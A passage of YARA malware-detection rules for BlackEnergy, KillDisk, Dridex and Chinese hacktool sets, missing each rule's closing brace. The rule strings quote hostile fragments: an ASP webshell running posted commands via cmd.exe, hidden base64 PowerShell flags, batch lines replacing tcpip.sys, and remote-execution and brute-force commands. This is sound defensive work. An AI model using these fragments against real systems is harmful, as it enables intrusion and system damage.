           $s3 = "KdDebuggerEnabled" fullword ascii /* Goodware String - occured 69 times */   
       condition:   
           uint16(0) == 0x5a4d and filesize < 180KB and all of them   
rule DropBear_SSH_Server   
    {   
      
       meta:   
           description = "Detects DropBear SSH Server (not a threat but used to maintain access)"   
           author = "Florian Roth"   
           reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"   
           date = "2016-01-03"   
           score = 50   
           hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"   
          
       strings:   
           $s1 = "Dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.html" fullword ascii   
           $s2 = "Badly formatted command= authorized_keys option" fullword ascii   
           $s3 = "This Dropbear program does not support '%s' %s algorithm" fullword ascii   
           $s4 = "/etc/dropbear/dropbear_dss_host_key" fullword ascii   
           $s5 = "/etc/dropbear/dropbear_rsa_host_key" fullword ascii   
          
       condition:   
           uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them   
rule BlackEnergy_Driver_AMDIDE    
   {   
      
       meta:   
           description = "Auto-generated rule - from files 32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614, 3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2, 90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c, 97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"   
           author = "Florian Roth"   
           reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"   
           date = "2016-01-04"   
           super_rule = 1   
           hash1 = "32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614"   
           hash2 = "3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2"   
           hash3 = "90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c"   
           hash4 = "97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"   
           hash5 = "5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc"   
           hash6 = "cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988"   
           hash7 = "1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68"   
         
       strings:   
           $s1 = " AMD IDE driver" fullword wide   
           $s2 = "SessionEnv" fullword wide   
           $s3 = "\\DosDevices\\{C9059FFF-1C49-4445-83E8-" wide   
           $s4 = "\\Device\\{C9059FFF-1C49-4445-83E8-" wide   
          
       condition:   
           uint16(0) == 0x5a4d and filesize < 150KB and all of them   
rule BlackEnergy_KillDisk_2    
   {   
      
       meta:   
           description = "Detects KillDisk malware from BlackEnergy"   
           author = "Florian Roth"   
           reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"   
           date = "2016-01-03"   
           score = 80   
           super_rule = 1   
           hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"   
           hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"   
           hash3 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"   
      
       strings:   
           $s0 = "%c:\\~tmp%08X.tmp" fullword ascii   
           $s1 = "%s%08X.tmp" fullword ascii   
           $s2 = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" fullword wide   
           $s3 = "%ls_%ls_%ls_%d.~tmp" fullword wide   
      
       condition:   
           uint16(0) == 0x5a4d and filesize < 500KB and 3 of them   
rule Contains_hidden_PE_File_inside_a_sequence_of_numbers : maldoc   
   {   
   	meta:   
   		author = "Martin Willing (https://evild3ad.com)"   
   		description = "Detect a hidden PE file inside a sequence of numbers (comma separated)"   
   		reference = "http://blog.didierstevens.com/2016/01/07/blackenergy-xls-dropper/"   
   		reference = "http://www.welivesecurity.com/2016/01/04/blackenergy-trojan-strikes-again-attacks-ukrainian-electric-power-industry/"   
   		date = "2016-01-09"   
   		filetype = "decompressed VBA macro code"   
   		   
   	strings:   
   		$a = "= Array(" // Array of bytes   
   		$b = "77, 90," // MZ   
   		$c = "33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111, 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46," // !This program cannot be run in DOS mode.   
   	   
   	condition:   
   	 	all of them   
// https://otx.alienvault.com/pulse/58ecc39479f8bf6099c0ef32
rule Dridex_Trojan_XML : maldoc {   
   	meta:   
   		description = "Dridex Malware in XML Document"   
   		author = "Florian Roth @4nc4p"   
   		reference = "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503"   
   		date = "2015/03/08"   
   		hash1 = "88d98e18ed996986d26ce4149ae9b2faee0bc082"   
   		hash2 = "3b2d59adadf5ff10829bb5c27961b22611676395"   
   		hash3 = "e528671b1b32b3fa2134a088bfab1ba46b468514"   
   		hash4 = "981369cd53c022b434ee6d380aa9884459b63350"   
   		hash5 = "96e1e7383457293a9b8f2c75270b58da0e630bea"   
   	strings:   
   		// can be ascii or wide formatted - therefore no restriction   
   		$c_xml      = "<?xml version="   
   		$c_word     = "<?mso-application progid=\"Word.Document\"?>"   
   		$c_macro    = "w:macrosPresent=\"yes\""   
   		$c_binary   = "<w:binData w:name="   
   		$c_0_chars  = "<o:Characters>0</o:Characters>"   
   		$c_1_line   = "<o:Lines>1</o:Lines>"   
   	condition:   
   		all of ($c*)   
rule PHISH_02Dez2015_attach_P_ORD_C_10156_124658 {   
   	meta:   
   		description = "Phishing Wave - file P-ORD-C-10156-124658.xls"   
   		author = "Florian Roth"   
   		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"   
   		date = "2015-12-02"   
   		hash = "bc252ede5302240c2fef8bc0291ad5a227906b4e70929a737792e935a5fee209"   
   	strings:   
   		$s1 = "Execute" ascii   
   		$s2 = "Process WriteParameterFiles" fullword ascii   
   		$s3 = "WScript.Shell" fullword ascii   
   		$s4 = "STOCKMASTER" fullword ascii   
   		$s5 = "InsertEmailFax" ascii   
   	condition:   
   		uint16(0) == 0xcfd0 and filesize < 200KB and all of them   
rule PHISH_02Dez2015_dropped_p0o6543f {   
   	meta:   
   		description = "Phishing Wave - file p0o6543f.exe"   
   		author = "Florian Roth"   
   		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"   
   		date = "2015-12-02"   
   		hash = "db788d6d3a8ed1a6dc9626852587f475e7671e12fa9c9faa73b7277886f1e210"   
   	strings:   
   		$s1 = "netsh.exe" fullword wide   
   		$s2 = "routemon.exe" fullword wide   
   		$s3 = "script=" fullword wide /* Goodware String - occured 4 times */   
   		$s4 = "disconnect" fullword wide /* Goodware String - occured 14 times */   
   		$s5 = "GetClusterResourceTypeKey" fullword ascii /* Goodware String - occured 17 times */   
   		$s6 = "QueryInformationJobObject" fullword ascii /* Goodware String - occured 34 times */   
   		$s7 = "interface" fullword wide /* Goodware String - occured 52 times */   
   		$s8 = "connect" fullword wide /* Goodware String - occured 61 times */   
   		$s9 = "FreeConsole" fullword ascii /* Goodware String - occured 91 times */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 250KB and all of them   
// https://otx.alienvault.com/pulse/5589f402b45ff578e825e6f2
rule APT_OLE_JSRat : maldoc APT   
   {   
   meta:   
   	author = "Rahul Mohandas"   
   	Date = "2015-06-16"   
   	Description = "Targeted attack using Excel/word documents"   
   strings:   
   	$header = {D0 CF 11 E0 A1 B1 1A E1}   
   	$key1 = "AAAAAAAAAA"   
   	$key2 = "Base64Str" nocase   
   	$key3 = "DeleteFile" nocase   
   	$key4 = "Scripting.FileSystemObject" nocase   
   condition:   
   	$header at 0 and (all of ($key*) )   
// https://otx.alienvault.com/pulse/5937358f2ea86b08b86e5063
rule FE_LEGALSTRIKE_MACRO {   
          meta:version=".1"   
          filetype="MACRO"   
          author="Ian.Ahl@fireeye.com @TekDefense"   
          date="2017-06-02"   
          description="This rule is designed to identify macros with the specific encoding used in the sample 30f149479c02b741e897cdb9ecd22da7."   
   strings:   
          // OBSFUCATION   
          $ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)" ascii wide   
          $ob2 = "ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110) & ChrW(32) & ChrW(47)" ascii wide   
          $ob3 = "ChrW(117) & ChrW(32) & ChrW(47) & ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(115)" ascii wide   
          $ob4 = "ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) & ChrW(99) & ChrW(100) & ChrW(105) & ChrW(115)" ascii wide   
          $ob5 = "ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46) & ChrW(50) & ChrW(98) & ChrW(117) & ChrW(110)" ascii wide   
          $ob6 = "ChrW(110) & ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(65) & ChrW(117) & ChrW(116)" ascii wide   
          $ob7 = "ChrW(111) & ChrW(100) & ChrW(105) & ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(32)" ascii wide   
          $ob8 = "ChrW(115) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(46) & ChrW(100) & ChrW(108) & ChrW(108)" ascii wide   
          $obreg1 = /(\w{5}\s&\s){7}\w{5}/   
          $obreg2 = /(Chrw\(\d{1,3}\)\s&\s){7}/   
          // wscript   
          $wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide   
          $wsobj2 = "Obj.Run " ascii wide   
      
   condition:   
           (   
                 (   
                         (uint16(0) != 0x5A4D)   
                 )   
                 and   
                 (   
                         all of ($wsobj*) and 3 of ($ob*)   
                         or   
                         all of ($wsobj*) and all of ($obreg*)   
                 )   
          )   
rule FE_LEGALSTRIKE_RTF {   
       meta:   
           version=".1"   
           filetype="MACRO"   
           author="joshua.kim@FireEye.com"   
           date="2017-06-02"   
           description="Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom"   
      
       strings:   
           $header = "{\\rt"   
      
           $lnkinfo = "4c0069006e006b0049006e0066006f"   
      
           $encoded1 = "4f4c45324c696e6b"   
           $encoded2 = "52006f006f007400200045006e007400720079"   
           $encoded3 = "4f0062006a0049006e0066006f"   
           $encoded4 = "4f006c0065"   
      
           $http1 = "68{"   
           $http2 = "74{"   
           $http3 = "07{"   
      
           // 2bunny.com   
           $domain1 = "32{\\"   
           $domain2 = "62{\\"   
           $domain3 = "75{\\"   
           $domain4 = "6e{\\"   
           $domain5 = "79{\\"   
           $domain6 = "2e{\\"   
           $domain7 = "63{\\"   
           $domain8 = "6f{\\"   
           $domain9 = "6d{\\"   
      
           $datastore = "\\*\\datastore"   
      
       condition:   
           $header at 0 and all of them   
rule FE_LEGALSTRIKE_MACRO_2 {   
          meta:version=".1"   
          filetype="MACRO"   
          author="Ian.Ahl@fireeye.com @TekDefense"   
          date="2017-06-02"   
          description="This rule was written to hit on specific variables and powershell command fragments as seen in the macro found in the XLSX file3a1dca21bfe72368f2dd46eb4d9b48c4."   
   strings:   
          // Setting the environment   
          $env1 = "Arch = Environ(\"PROCESSOR_ARCHITECTURE\")" ascii wide   
          $env2 = "windir = Environ(\"windir\")" ascii wide   
          $env3 = "windir + \"\\syswow64\\windowspowershell\\v1.0\\powershell.exe\"" ascii wide   
          // powershell command fragments   
          $ps1 = "-NoP" ascii wide   
          $ps2 = "-NonI" ascii wide   
          $ps3 = "-W Hidden" ascii wide   
          $ps4 = "-Command" ascii wide   
          $ps5 = "New-Object IO.StreamReader" ascii wide   
          $ps6 = "IO.Compression.DeflateStream" ascii wide   
          $ps7 = "IO.MemoryStream" ascii wide   
          $ps8 = ",$([Convert]::FromBase64String" ascii wide   
          $ps9 = "ReadToEnd();" ascii wide   
          $psregex1 = /\W\w+\s+\s\".+\"/   
   condition:   
          (   
                 (   
                         (uint16(0) != 0x5A4D)   
                 )   
                 and   
                 (   
                         all of ($env*) and 6 of ($ps*)   
                         or   
                         all of ($env*) and 4 of ($ps*) and all of ($psregex*)   
                 )   
          )   
// https://otx.alienvault.com/pulse/5977c9ed0972115990362a3b
rule aspfile1 {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file aspfile1.asp"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "77b1e3a6e8f67bd6d16b7ace73dca383725ac0af"   
   	strings:   
   		$s0 = "' -- check for a command that we have posted -- '" fullword ascii   
   		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword ascii   
   		$s5 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"><BODY>" fullword ascii   
   		$s6 = "<input type=text name=\".CMD\" size=45 value=\"<%= szCMD %>\">" fullword ascii   
   		$s8 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword ascii   
   		$s15 = "szCMD = Request.Form(\".CMD\")" fullword ascii   
   	condition:   
   		3 of them   
rule Ammyy_Admin_AA_v3 {   
   	meta:   
   		description = "Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe"   
   		author = "Florian Roth"   
   		reference = "http://goo.gl/gkAg2E"   
   		date = "2014/12/22"   
   		score = 55   
   		hash1 = "b130611c92788337c4f6bb9e9454ff06eb409166"   
   		hash2 = "07539abb2623fe24b9a05e240f675fa2d15268cb"   
   	strings:   
   		$x1 = "S:\\Ammyy\\sources\\target\\TrService.cpp" fullword ascii   
   		$x2 = "S:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cpp" fullword ascii   
   		$x3 = "Global\\Ammyy.Target.IncomePort" fullword ascii   
   		$x4 = "S:\\Ammyy\\sources\\target\\TrFmFileSys.cpp" fullword ascii   
   		$x5 = "Please enter password for accessing remote computer" fullword ascii   
      
   		$s1 = "CreateProcess1()#3 %d error=%d" fullword ascii   
   		$s2 = "CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name." fullword ascii   
   		$s3 = "ERROR: CreateProcessAsUser() error=%d, session=%d" fullword ascii   
   		$s4 = "ERROR: FindProcessByName('explorer.exe')" fullword ascii   
   	condition:   
   		2 of ($x*) or all of ($s*)   
rule stealth_Stealth {   
   	meta:   
   		description = "Auto-generated rule on file Stealth.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "8ce3a386ce0eae10fc2ce0177bbc8ffa"   
   	strings:   
   		$s3 = "<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>"   
   		$s6 = "This tool may be used only by system administrators. I am not responsible for "   
   	condition:   
   		all of them   
rule DUBrute_DUBrute {   
   	meta:   
   		description = "Chinese Hacktool Set - file DUBrute.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "8aaae91791bf782c92b97c6e1b0f78fb2a9f3e65"   
   	strings:   
   		$s1 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii   
   		$s2 = "IP - 0; Login - 0; Password - 0; Combination - 0" fullword ascii   
   		$s3 = "Create %d IP@Loginl;Password" fullword ascii   
   		$s4 = "UBrute.com" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1020KB and all of them   
rule CN_Toolset_LScanPortss_2 {   
   	meta:   
   		description = "Detects a Chinese hacktool from a disclosed toolset - file LScanPortss.exe"   
   		author = "Florian Roth"   
   		reference = "http://qiannao.com/ls/905300366/33834c0c/"   
   		reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"   
   		date = "2015/03/30"   
   		score = 70   
   		hash = "4631ec57756466072d83d49fbc14105e230631a0"   
   	strings:   
   		$s1 = "LScanPort.EXE" fullword wide   
   		$s3 = "www.honker8.com" fullword wide   
   		$s4 = "DefaultPort.lst" fullword ascii   
   		$s5 = "Scan over.Used %dms!" fullword ascii   
   		$s6 = "www.hf110.com" fullword wide   
   		$s15 = "LScanPort Microsoft " fullword wide   
   		$s18 = "L-ScanPort2.0 CooFly" fullword wide   
   	condition:   
   		4 of them   
rule Pc_pc2015 {   
   	meta:   
   		description = "Chinese Hacktool Set - file pc2015.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "de4f098611ac9eece91b079050b2d0b23afe0bcb"   
   	strings:   
   		$s0 = "\\svchost.exe" fullword ascii   
   		$s1 = "LON\\OD\\O-\\O)\\O%\\O!\\O=\\O9\\O5\\O1\\O" fullword ascii   
   		$s8 = "%s%08x.001" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 309KB and all of them   
rule StealthWasp_s_Basic_PortScanner_v1_2 {   
   	meta:   
   		description = "Auto-generated rule on file StealthWasp's Basic PortScanner v1.2.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "7c0f2cab134534cd35964fe4c6a1ff00"   
   	strings:   
   		$s1 = "Basic PortScanner"   
   		$s6 = "Now scanning port:"   
   	condition:   
   		all of them   
rule hydra_7_3_hydra {   
   	meta:   
   		description = "Chinese Hacktool Set - file hydra.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "2f82b8bf1159e43427880d70bcd116dc9e8026ad"   
   	strings:   
   		$s1 = "[ATTEMPT-ERROR] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu" fullword ascii   
   		$s2 = "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICE" ascii   
   		$s3 = "cn=^USER^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.com" fullword ascii   
   		$s4 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii   
   		$s5 = "hydra -P pass.txt target cisco-enable  (direct console access)" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 700KB and 1 of them   
rule Hacktools_CN_GOGOGO_Bat {   
   	meta:   
   		description = "Disclosed hacktool set - file GOGOGO.bat"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "4bd4f5b070acf7fe70460d7eefb3623366074bbd"   
   	strings:   
   		$s0 = "for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%x" fullword ascii   
   		$s1 = "http://www.tzddos.com/ -------------------------------------------->byebye.txt" fullword ascii   
   		$s2 = "ren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bak" fullword ascii   
   		$s4 = "IF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )" fullword ascii   
   		$s5 = "copy *.tzddos scan.bat&del *.tzddos" fullword ascii   
   		$s6 = "del /f tcpip.sys" fullword ascii   
   		$s9 = "if /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )" fullword ascii   
   		$s10 = "call scan.bat" fullword ascii   
   		$s12 = "IF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )" fullword ascii   
   		$s13 = "IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )" fullword ascii   
   		$s18 = "sc config LmHosts start= auto" fullword ascii   
   		$s19 = "copy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nul" fullword ascii   
   		$s20 = "ren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak" fullword ascii   
   	condition:   
   		3 of them   
rule CN_Tools_VNCLink {   
   	meta:   
   		description = "Chinese Hacktool Set - file VNCLink.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "cafb531822cbc0cfebbea864489eebba48081aa1"   
   	strings:   
   		$s1 = "C:\\temp\\vncviewer4.log" fullword ascii   
   		$s2 = "[BL4CK] Patched by redsand || http://blacksecurity.org" fullword ascii   
   		$s3 = "fake release extendedVkey 0x%x, keysym 0x%x" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 580KB and 2 of them   
rule _Project1_Generate_rejoice {   
   	meta:   
   		description = "Chinese Hacktool Set - from files Project1.exe, Generate.exe, rejoice.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		super_rule = 1   
   		hash0 = "d1a5e3b646a16a7fcccf03759bd0f96480111c96"   
   		hash1 = "2cb4c3916271868c30c7b4598da697f59e9c7a12"   
   		hash2 = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"   
   	strings:   
   		$s1 = "sfUserAppDataRoaming" fullword ascii   
   		$s2 = "$TRzFrameControllerPropertyConnection" fullword ascii   
   		$s3 = "delphi32.exe" fullword ascii   
   		$s4 = "hkeyCurrentUser" fullword ascii   
   		$s5 = "%s is not a valid IP address." fullword wide   
   		$s6 = "Citadel hooking error" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 2000KB and all of them   
rule sig_238_webget {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file webget.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "36b5a5dee093aa846f906bbecf872a4e66989e42"   
   	strings:   
   		$s0 = "Packed by exe32pack" ascii   
   		$s1 = "GET A HTTP/1.0" fullword ascii   
   		$s2 = " error " fullword ascii   
   		$s13 = "Downloa" ascii   
   	condition:   
   		all of them   
rule CN_Tools_Shiell {   
   	meta:   
   		description = "Chinese Hacktool Set - file Shiell.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "b432d80c37abe354d344b949c8730929d8f9817a"   
   	strings:   
   		$s1 = "C:\\Users\\Tong\\Documents\\Visual Studio 2012\\Projects\\Shift shell" ascii   
   		$s2 = "C:\\Windows\\System32\\Shiell.exe" fullword wide   
   		$s3 = "Shift shell.exe" fullword wide   
   		$s4 = "\" /v debugger /t REG_SZ /d \"" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1500KB and 2 of them   
rule BypassUacDll_6 {   
   	meta:   
   		description = "Auto-generated rule - file BypassUacDll.aps"   
   		author = "yarGen Yara Rule Generator"   
   		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"   
   	strings:   
   		$s3 = "BypassUacDLL.dll" fullword wide   
   		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii   
   	condition:   
   		all of them   
rule kiwi_tools {   
   	meta:   
   		description = "Chinese Hacktool Set - from files kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, mimikatz.sys, sekurlsa.dll, kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, mimikatz.sys, sekurlsa.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		super_rule = 1   
   		hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553"   
   		hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"   
   		hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"   
   		hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"   
   		hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec"   
   		hash5 = "7addce4434670927c4efaa560524680ba2871d17"   
   		hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7"   
   		hash7 = "b5c93489a1b62181594d0fb08cc510d947353bc8"   
   		hash8 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"   
   		hash9 = "5d578df9a71670aa832d1cd63379e6162564fb6b"   
   		hash10 = "febadc01a64a071816eac61a85418711debaf233"   
   		hash11 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"   
   		hash12 = "56a61c808b311e2225849d195bbeb69733efe49a"   
   		hash13 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"   
   		hash14 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"   
   		hash15 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6"   
   		hash16 = "20facf1fa2d87cccf177403ca1a7852128a9a0ab"   
   		hash17 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5"   
   	strings:   
   		$s1 = "http://blog.gentilkiwi.com/mimikatz" ascii   
   		$s2 = "Benjamin Delpy" fullword ascii   
   		$s3 = "GlobalSign" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1000KB and all of them   
rule Hacktools_CN_Panda_445 {   
   	meta:   
   		description = "Disclosed hacktool set - file 445.rar"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "a61316578bcbde66f39d88e7fc113c134b5b966b"   
   	strings:   
   		$s0 = "for /f %%i in (ips.txt) do (start cmd.bat %%i)" fullword ascii   
   		$s1 = "445\\nc.exe" fullword ascii   
   		$s2 = "445\\s.exe" fullword ascii   
   		$s3 = "cs.exe %1" fullword ascii   
   		$s4 = "445\\cs.exe" fullword ascii   
   		$s5 = "445\\ip.txt" fullword ascii   
   		$s6 = "445\\cmd.bat" fullword ascii   
   		$s9 = "@echo off" fullword ascii   
   	condition:   
   		all of them   
rule XYZCmd_zip_Folder_XYZCmd {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file XYZCmd.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "bbea5a94950b0e8aab4a12ad80e09b630dd98115"   
   	strings:   
   		$s0 = "Executes Command Remotely" fullword wide   
   		$s2 = "XYZCmd.exe" fullword wide   
   		$s6 = "No Client Software" fullword wide   
   		$s19 = "XYZCmd V1.0 For NT S" fullword ascii   
   	condition:   
   		all of them   
rule WindowsCredentialEditor   
   {   
       meta:   
       	description = "Windows Credential Editor" threat_level = 10 score = 90   
       strings:   
   		$a = "extract the TGT session key"   
   		$b = "Windows Credentials Editor"   
       condition:   
       	$a or $b   
rule XYZCmd_zip_Folder_Readme {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file Readme.txt"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "967cb87090acd000d22e337b8ce4d9bdb7c17f70"   
   	strings:   
   		$s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" fullword ascii   
   		$s20 = "XYZCmd V1.0" fullword ascii   
   	condition:   
   		all of them   
rule BypassUac_9 {   
   	meta:   
   		description = "Auto-generated rule - file BypassUac.zip"   
   		author = "yarGen Yara Rule Generator"   
   		hash = "93c2375b2e4f75fc780553600fbdfd3cb344e69d"   
   	strings:   
   		$s0 = "/x86/BypassUac.exe" fullword ascii   
   		$s1 = "/x64/BypassUac.exe" fullword ascii   
   		$s2 = "/x86/BypassUacDll.dll" fullword ascii   
   		$s3 = "/x64/BypassUacDll.dll" fullword ascii   
   		$s15 = "BypassUac" fullword ascii   
   	condition:   
   		all of them   
rule aspbackdoor_regdll {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file regdll.asp"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "5c5e16a00bcb1437bfe519b707e0f5c5f63a488d"   
   	strings:   
   		$s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii   
   		$s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" fullword ascii   
   		$s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" fullword ascii   
   		$s5 = "Public Property Get oFS()" fullword ascii   
   	condition:   
   		all of them   
rule hkmjjiis6 {   
   	meta:   
   		description = "Chinese Hacktool Set - file hkmjjiis6.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7"   
   	strings:   
   		$s1 = "comspec" fullword ascii   
   		$s2 = "user32.dlly" ascii   
   		$s3 = "runtime error" ascii   
   		$s4 = "WinSta0\\Defau" ascii   
   		$s5 = "AppIDFlags" fullword ascii   
   		$s6 = "GetLag" fullword ascii   
   		$s7 = "* FROM IIsWebInfo" ascii   
   		$s8 = "wmiprvse.exe" ascii   
   		$s9 = "LookupAcc" ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 70KB and all of them   
rule CN_Hacktool_S_EXE_Portscanner {   
   	meta:   
   		description = "Detects a chinese Portscanner named s.exe"   
   		author = "Florian Roth"   
   		score = 70   
   		date = "12.10.2014"   
   	strings:   
   		$s0 = "\\Result.txt" fullword ascii   
   		$s1 = "By:ZT QQ:376789051" fullword ascii   
   		$s2 = "(http://www.eyuyan.com)" fullword wide   
   	condition:   
   		all of them   
rule KiwiTaskmgr_2 {   
   	meta:   
